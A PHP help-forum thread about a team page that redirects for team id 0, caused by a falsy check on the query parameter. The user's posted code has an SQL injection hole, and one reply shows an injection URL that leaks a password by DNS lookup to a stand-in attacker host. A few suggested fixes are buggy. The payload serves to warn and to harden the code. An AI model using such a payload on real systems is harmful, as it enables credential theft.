PHP help needed. Webpage php script works for all teams except team "0"


Solved by mac_gyver


Hello all. I have a bit of a strange situation that I'm scratching my head about. I have a Sports website and I have a simple script on this website that has been working for dozens of years, which recently has decided not to work properly - for only team "0".  When I run this webpage using this PHP script https://www.baltimorebeach.com/ap/viewTeam.php?t=2 this page works (as does all the other team pages) and this page does not https://www.baltimorebeach.com/ap/viewTeam.php?t=0 and I can't figure out why it is suddenly not working. It works with every other team except for team "0" which is my team.  Anyone have any thoughts on this? 

Thanks for your assistance.


Without any code, there is no way to make any type of qualified assessment on what the problem is. But, I will venture a guess.

PHP is a "loosely" typed language. That means that variables can be used as different types. For example, you can use a string variable "2" as an integer 2. My guess is that there is some condition in the code that tests to see if the team ID is valid (i.e. not false). But, because the integer zero is also interpreted as the Boolean False the test is failing. Here is some mock code of what I am talking about:

if(isset($_GET['t'])) {
    $teamId = $_GET['t'];
} else {
    $teamId = false;
}

if($teamId == false) {
    //Team ID is false, don't show the content
} else {
    //Show the team content
}

A team ID of zero will result in the error condition. You could correct THAT scenario by using the identical condition of !==. But, there can be multiple scenarios where a zero is being misinterpreted and you would have to look at each one to determine what the correct solution would be. There is a reason that most (all) databases start at 1 as the initial primary ID. Assuming this is a primary key in the DB, I would suggest changing that team's ID to a new unique number and updating all associated data.


On the subject of "loose typing of variables", version 8 of PHP is stricter than earlier versions. It could be that the failure now is due to an upgrade to this version from an old version.

What error messages are you getting?


Hi all.  I'm not getting any errors.  My page just reverts to my home page.  Now this .php?t=0 has been working for more than a dozen years without fail.  My PHP version is:  PHP Version 7.0.33

There have been no changes to this page in years.  Not sure why this fails the past few months.


Well, obviously, something has changed. We have no access to the code, the web server, etc. I have provided a "best guess" based on the only piece of information provided: team id is 0. I still think the most likely cause is something due to the value being the value zero.

As to not seeing any errors, what level of error reporting do you have enabled? In a production environment, most errors should be suppressed.

Have you even inspected the page viewTeam.php (and any included pages) to look at the code? Have you added any debugging logic to see where in the execution the logic is failing to do what you expect?



while zero is a valid number, it should have never been used as a data identifier. any chance you can go through and change to use the next higher unused id?

this could be anything from redirects without exit/die statements through to the database (strict) mode. this could even be due to obsolete html markup interacting with the latest version of a browser. if you cannot determine the cause of the problem, you will need to post all the code, less the database credentials, needed to reproduce the problem.

you state this reverts to the home page. what exactly does that mean, ap/index.php? you could be seeing the result of the last of multiple page requests/redirects, i.e. it could have displayed the expected output, but then redirected to the 'home page'.

Edited by mac_gyver

You have been provided some plausible theories already.  As explained by Psycho, with loosely typed languages like PHP, type coercion is often used in logic statements, where zero is equivalent to false.  

You have been asked a number of times for some code to look at.  Days have now gone by, and still we have no code to analyze.  

You also have said that you get no errors, but I'm not sure if we can trust that information.  A production PHP site is typically set up to not display any errors, and usually to log them to a file instead.  Have you verified your configuration, and checked the relevant error file?


Hello gizmola.

Unfortunately we use a dedicated host at Network Solutions, so I don't have access to error reporting files and items like that.  I use an MS SQL server on a windows platform running HTML & PHP.  So I am quite limited on what I can do.  Again everything was working this way for more than a dozen years and with no changes in the code, this just started acting up in late March of this year.  Since it was a minor annoyance and affected only my team, I could make the changes on the back end in the database manually, but was curious why the heck this was happening in the first place.


<?php
require_once('seabass.php');

if(!$_GET['t'])
{
 header('Location: http://www.baltimorebeach.com');
}

$id = $_GET['t'];
$name = "admin";
//connect to DB and run queries

require_once('../database.php');

$query = "SELECT * FROM player WHERE team = $id";
$players = mssqlquery($query);
/*if(mssqlrowsaffectedX($players) != 1)
{
  mssqlclose();
  header('Location: http://www.baltimorebeach.com');
}
*/
$t_query = "SELECT t.*, l.* FROM team as t, league as l WHERE t.league = l.l_id AND t.t_id = $id";
$t_info = mssqlquery($t_query);
$team = mssqlfetchassoc($t_info);

$c_query = "SELECT * FROM captain WHERE c_id = $team[captain]";
$c_info = mssqlquery($c_query);
$cpt = mssqlfetchassoc($c_info);


//print_r($team);
//die();
//--------------------
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Baltimore Beach Control Panel</title>
<link rel="stylesheet" href="../cp/cpanel.css" type="text/css">
<script language="JavaScript" type="text/JavaScript">
<!--
function MM_reloadPage(init) {  //reloads the window if Nav4 resized
  if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
    document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
  else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script></head>

<body>


<table width="922" border="0" cellpadding="0" cellspacing="0">
  <tr>
    <td><img src="images/BBV_AP_top.jpg" width="922" height="200"></td>
  </tr>
  <tr>
    <td><table width="100%"  border="0" cellspacing="0" cellpadding="2">
      <tr>
        <td width="14%" class="menu"><div align="center"><a href="index.php">Admin Home</a> </div></td>
        <td width="17%" class="menu"><div align="center"><a href="viewLeague.php">View Spring League</a></div></td>
        <td width="16%" class="menu"><div align="center"><a href="viewCapt.php">View Captains</a> </div></td>
        <td width="19%" class="menu"><div align="center"><a href="viewSummerLeague.php">View Summer League </a></div></td>
        <td width="22%" class="menu"><div align="center"><a href="viewKahunaTournament.php">View Kahuna Tournament </a></div></td>
        <td width="8%" class="menu"><div align="center"></div></td>
        <td width="3%" class="menu"><div align="center"></div></td>
        <td width="1%" class="menu"><div align="center"></div></td>
      </tr>
    </table></td>
  </tr>
  <tr>
    <td><table width="923"  border="0" cellspacing="1" cellpadding="1">
      <tr>
        <td width="33%" align="left" valign="top"><br>
          <table width="100%"  border="0" cellpadding="2" cellspacing="0" class="grey2px">
            <tr>
              <td colspan="2" class="dk_greyTxt"><h3><strong>Captain's Information</strong></h3></td>
              </tr>
            <tr>
              <td width="41%" class="dk_greyTxt"><strong>Name</strong></td>
              <td width="59%"><?php echo $cpt['firstname'].' '.$cpt['lastname']; ?> </td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>Address</strong></td>
              <td><?php echo $cpt['address']; ?><br>
                  <?php echo "$cpt[city], $cpt[state] $cpt[zip]"; ?> </td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>Phone</strong></td>
              <td><?php echo $cpt['phone'] ?></td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>E-mail</strong></td>
              <td><a href="mailto:<?php echo $cpt['email'] ?>"><?php echo $cpt['email'] ?></a></td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>Shirt Size</strong></td>
              <td><?php echo $cpt['shirtsize'] ?></td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>Shirt Ordered</strong></td>
              <td><?php if($cpt['tsordered'] != '') 
	          {
			     echo "Yes in Order {$cpt['tsordered']}";
			  } 
			  else
			  {
			    echo 'No';
			  }  
	?></td>
            </tr>
            <tr>
              <td class="dk_greyTxt">&nbsp;</td>
              <td><form action="editCpt.php" method="post" name="cptform" id="cptform">
                  <input type="hidden" value="<?php echo $cpt['c_id'] ?>" name="cpt">
                  <input type="hidden" value="<?php echo $team['t_id'] ?>" name="team">
                  <input name="Submit" type="Submit" class="button" value="Edit Captain">
              </form></td>
            </tr>
          </table>
          <br></td>
        <td width="64%" rowspan="2" align="left" valign="top"><br>
          <table width="100%" cellpadding="1" cellspacing="0" class="grey2px">
            <tr class="dk_greyTxt">
              <td colspan="7"><h3><strong>Player's Information</strong></h3></td>
            </tr>
            <tr class="dk_greyTxt">
              <td width="18%" valign="bottom"><strong>Name</strong></td>
              <td width="21%" valign="bottom"><strong>E-mail</strong></td>
              <td width="21%" valign="bottom"><strong>Shirt Size</strong></td>
              <td width="8%" align="center" valign="bottom"><strong>Fee<br>
Paid</strong></td>
              <td width="9%" align="center" valign="bottom"><strong>Shirt<br>
                Ordered
              </strong></td>
              <td width="7%">&nbsp;</td>
              <td width="16%">&nbsp;</td>
            </tr>
            <?php 
		$i=0;
		while($row = mssqlfetchassoc($players))
		{
		 
		?>
            <tr <?php if($i%2 == 0) echo "class='altbg'";?> >
              <td><?php echo $row['name'] ?></td>
              <td><?php echo $row['email'] ?></td>
              <td align="center"><?php echo $row['pshirt'] ?></td>
              <td align="center"><?php if($row['feepaid'] == 'y') 
	          {
			    echo "<img src='images/check.gif' />";
			  } 
			  else
			  {
			    echo 'No';
			  }  
	?></td>
              <td align="center"><?php if($row['ptsordered'] != '') 
	          {
			    echo "<img src='images/check.gif' /> {$row['ptsordered']}";
			  } 
			  else
			  {
			    echo 'No';
			  }  
	?></td>
              <td>
               <?php
			if($row['ptsordered'] == '')
			{
			?>
                  <form name="player<?= $row['p_id'] ?>" action="editPlayer.php" method="get">
                  <input type="hidden" name="p" value="<?= $row['p_id'] ?>">
                  <input name="Submit" type="submit" class="button" value="Edit">
              </form>
            <?php
			}
			?>
            </td>
      
             <td><form name="del_player<?= $row['p_id'] ?>" action="remPlayer.php" method="post" onSubmit="return(confirm('Are you sure you want to delete <?= $row['name']?>?\n\nThis cannot be reversed'))">
                  <input type="hidden" name="p" value="<?= $row['p_id'] ?>">
                  <input type="hidden" name="t" value="<?= $id ?>">                  
                  <input name="Submit" type="submit" class="button" value="Remove">
              </form></td>
            </tr>
            <?php $i++; } ?>
            
			<tr><td colspan="7">&nbsp;</td></tr>
			<tr bgcolor="FFCB00"><td colspan="7" align="right"><a href="addPlayer.php?t=<?= $id ?>"><strong>
				Add Player</strong></a></td>
			</tr>
          </table></td>
      </tr>
      <tr>
        <td align="left" valign="top"><br>
          <table width="100%"  border="0" cellpadding="2" cellspacing="0" class="grey2px">
            <tr>
              <td colspan="2" class="dk_greyTxt"><h3>Team Information </h3></td>
              </tr>
            <tr>
              <td width="27%" class="dk_greyTxt"><strong>Name</strong></td>
              <td width="73%"><?php echo $team['teamname']; ?> (<a href="editTeam.php?t=<?= $team['t_id'] ?>">edit 
				team</a>)</td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>League</strong></td>
              <td><?php echo "$team[night] $team[type] $team[size]s"; ?></td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>Division</strong></td>
              <td><?php echo $team['division'] ?></td>
            </tr>
            <tr>
              <td class="dk_greyTxt"><strong>Registration Date </strong></td>
              <td>
                <?php //ho $team['reg_start']
                $date = date_create($team['reg_start']);
                 echo date_format($date, 'M j Y, g:i a');
                ?> 
                </td>
            </tr>
            <?php
	  if($cpt['feepaid'] == 'n')
	  {
	 ?>
            <tr>
              <td class="dk_greyTxt">&nbsp;</td>
              <td><form name="payfee" action="setTeamPaid.php" method="post">
                  <input type="hidden" value="<?php echo $cpt['c_id'] ?>" name="cpt">
                  <input type="hidden" value="<?php echo $team['t_id'] ?>" name="id">
                  <br>
                  <strong>Fee Payment Info:</strong><br>
                  <textarea name="feememo" rows="4" id="feememo"></textarea>
                  <br>
                  <input name="Submit" type="Submit" class="button" value="Team Fee Paid">
              </form></td>
            </tr>
            <?php
	  }
	  else
	  {
	 ?>
            <tr>
              <td class="dk_greyTxt"><strong>Registration Completed </strong></td>
              <td><?php 
              //echo $team['reg_done'] 
                 $date = date_create($team['reg_done']);
                 echo date_format($date, 'M j Y, g:i a');
              ?>
            </td>
            </tr>
            <?php
	}
	?>    
  <?php mssqlclose(); ?>
    
        
     
            <tr>
              <td align="left" class="dk_greyTxt"><strong>Returning Team</strong></td>
              <td align="left">
                <?php if($cpt['returningteam'] > '0' && $cpt['returningteam']!='no') echo "Yes"; else echo "No"; ?>&nbsp;&nbsp;&nbsp;&nbsp;
                    <input type="radio" name="radio" id="Spring" value="Spring" <?php if($cpt['returningteam'] == '1') echo "checked"; ?>>
                <label for="Spring">Returning Team</label></td>
            </tr>
            <tr>
              <td align="left" class="dk_greyTxt"><strong>Returning Team Name</strong></td>
              <td align="left"><?php echo $cpt['rteamname'] ?></td>
            </tr>
         
            <tr>
              <td align="left" class="dk_greyTxt"><strong>Locked in </strong></td>
              <td align="left"><?php if($team['locked']) echo "Yes"; else echo "No"; ?>            </tr>
            <tr>
              <td align="left" class="dk_greyTxt"><strong>Promo Code </strong></td>
              <td align="left"><?php echo $team['promocode'] ?>              
              </tr>

            <tr>
              <td class="dk_greyTxt"><strong>Record </strong></td>
              <td>&nbsp;</td>
            </tr>
            <tr>
              <td class="dk_greyTxt">&nbsp;</td>
              <td><form action="removeTeam.php" method="post" name="deleteform" id="deleteform" onSubmit="return(confirm('Are you sure you want to delete this team?\n\nThis cannot be reversed'))">
                  <input type="hidden" value="<?php echo $cpt['c_id'] ?>" name="cpt">
                  <input type="hidden" value="<?php echo $team['t_id'] ?>" name="id">
                  <input name="Submit" type="Submit" class="button" value="Remove Team">
					<br>
<font size="2">IP: <?php echo $team['ip']; ?></font></form></td>
            </tr>
            </table></td>
        </tr>
    </table></td>
  </tr>
</table>
<br>
</body>
</html>


1 hour ago, vbcoach said:
if(!$_GET['t'])
{
 header('Location: http://www.baltimorebeach.com');
}

this is the problem. a zero is a false value and the code is performing the header redirect.

as to why it 'worked' before,  something was probably preventing the header() from working (output being sent, which would have been producing a php error, should you have been able to display/log it) but since there's no exit/die statement after the redirect, the rest of the code on the page still ran in this case, so, you got the expected output for a zero value.

something probably changed in the server configuration, such as php's output_buffering setting getting turned on, which would now buffer whatever the output is, allowing the header() to work.

i wonder if your login access check code has exit/die statements after redirects to stop the rest of the code on the page from being executed?

you should also not put any external data directly into sql queries, where any sql special characters can break the sql query syntax, which is how sql injection is accomplished.

Edited by mac_gyver

As @mac_gyver stated, the problem is that line to check if the 't' value was sent. The way it is constructed, that condition will return true if the value is not set OR if the value is interpreted as false (which a zero value will be). You state that this was working for over 12 years and no changes were made to the code. I find that unlikely as PHP would have always interpreted a 0 as false in that condition (as far as I am aware). Perhaps that condition was previously written in a more explicit manner to account for a team ID of zero. E.g. 

if(!isset($_GET['t']) || ($_GET['t'] === false))

And someone looked at it and thought the code was more complicated than it needed to be and "fixed" it to be simpler.

So, your issue turned out to be exactly what I had hypothesized. You can either find all instances where teamID may be used in your code to ensure that a zero value will always work (poor fix) or (the right solution) change the primary key for that team to another value and then change the foreign key references to that ID.


I want to also offer a simple fix for the huge sql injection hole this code has.   At least in this script you can somewhat mitigate it by "casting" the url parameter to an integer.


// change

$id = $_GET['t'];

// To

$id = (int)$_GET['t'];


Usually this would work well, as in most systems there won't be a row with an id of zero.  


If for example, someone tries to pass a url parameter like this one, it could be really bad:

https:...yoursite.com?t= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.3w39ricodvyzuq0ood.somebadsite.net\1.xem',null,null))


Casting the get parameter to an integer would safely convert all that attempted sql injection code to 0.

You have the unfortunate situation that you decided to have a zero id, so you can't use that as a safety net now.  It's not the only nor best way to harden a system from sql injection attacks, but it is a simple and longstanding one, when your system intrinsically works with integer keys.


With that said, I took Psycho's code and tweaked it a bit, which will at least get your system working again with 0, and will protect against sql injection, but this problem could exist throughout the other scripts, and fixing this one problem may not make it usable for you again. 

To be clear replace the first few lines with these lines:


<?php
require_once('seabass.php');

if (!isset($_GET['t']) || !is_int($_GET['t') || $_GET['t'] < 0)
{
 header('Location: http://www.baltimorebeach.com');
}


And at least with this script your zero id team should load again.


Outstanding!  As you can tell, I am not a coder.  I implemented your changes, but I am now getting this error:

Parse error: syntax error, unexpected ';' in \\WDP\DFS\30\1\9\6\3007726691\user\sites\5346834.site\www\ap\viewTeam.php on line 6


Solution
7 hours ago, Psycho said:
is_int

this checks the datatype of the variable, not what's in the variable. get, post, cookies are by definition strings, regardless of what value they hold. change this to is_numeric().


I should have checked the is_int manual page, and should have seen that it checks PHP's internal type. 

Thanks to Psycho and mac_gyver we got you there, but just to be complete, is_numeric will pass many numbers through that are not integers.  To really do the job well, this is what I should have offered up from the beginning (and it also takes advantage of the typecasting I wrote about).


if (!isset($_GET['t']) || !is_numeric($_GET['t']) || !is_int((int)$_GET['t']) || $_GET['t'] < 0)
{
     header('Location: http://www.baltimorebeach.com');
     exit;
}


It is always very important that location redirects are followed by an exit, because redirection is a function of the browser.  The server is basically saying:  "you go here", but it is up to the browser to actually follow that instruction.  Bots and artificial clients may not play by the rules.

So the script should at that point exit, so that no additional code is run, or access restriction bypassed.  
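As an added example (not code from the thread or from the site), the validation gizmola arrives at above and mac_gyver's two points (exit after the redirect, keep external data out of the SQL text), written for PHP 7.0 since that is the version vbcoach reports. The `parseTeamId`, `verdicts` and `showTeam` names, the constructed sample inputs, and the PDO handle with the `sqlsrv` driver are assumptions; the site's own `mssql*` helpers are not shown in the thread and are not reproduced.

```php
<?php
// Added example (not from the thread or the site): accept a team id of 0,
// reject everything that is not a plain non-negative integer, stop after a
// redirect, and keep the id out of the SQL text. Written for PHP 7.0 syntax.

/**
 * Returns the team id as an int, or null when $raw is absent or is not a
 * plain non-negative decimal integer. "0" is valid here; "" and "1.5" are not.
 * $_GET values are always strings, so is_int($_GET['t']) can never be true,
 * and an (int) cast turns any junk into 0, which this site cannot use as a
 * sentinel because 0 is a real team. FILTER_VALIDATE_INT parses the whole
 * string or fails, which is the behaviour wanted here.
 *
 * @param string|null $raw  the raw value of $_GET['t'], or null if unset
 * @return int|null
 */
function parseTeamId($raw)
{
    if ($raw === null) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, array(
        'options' => array('min_range' => 0),   // reject negatives, allow 0
    ));
    return ($id === false) ? null : $id;
}

/**
 * Constructed sample inputs, each paired with what the thread's original
 * test `if (!$_GET['t'])` would have done with it, for comparison.
 */
function verdicts()
{
    $samples = array(null, '0', '2', '', 'abc', '1 OR 1=1', '-1', '1.5', '007');
    $out = array();
    foreach ($samples as $raw) {
        $out[] = array(
            'raw'      => var_export($raw, true),
            'parsed'   => var_export(parseTeamId($raw), true),
            'original' => !$raw ? 'redirect' : 'query runs',
        );
    }
    return $out;
}

/**
 * Request handler sketch. $db is assumed to be a PDO handle on the site's
 * MS SQL server (sqlsrv driver); $get is $_GET.
 */
function showTeam(array $get, PDO $db)
{
    $id = parseTeamId(isset($get['t']) ? $get['t'] : null);
    if ($id === null) {
        header('Location: http://www.baltimorebeach.com');
        exit; // a client that ignores the 3xx must not receive the rest of the page
    }
    // The id is bound as a parameter, never interpolated into the query text,
    // so no SQL special characters in the request can alter the statement.
    $stmt = $db->prepare('SELECT * FROM player WHERE team = :team');
    $stmt->bindValue(':team', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

if (PHP_SAPI === 'cli') {
    foreach (verdicts() as $v) {
        printf("%-12s parsed=%-6s original test: %s\n",
               $v['raw'], $v['parsed'], $v['original']);
    }
}
```

Run from the command line, the table shows the original test redirecting for "0" while letting "abc" and "1 OR 1=1" through to the query, whereas `parseTeamId` does the reverse.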

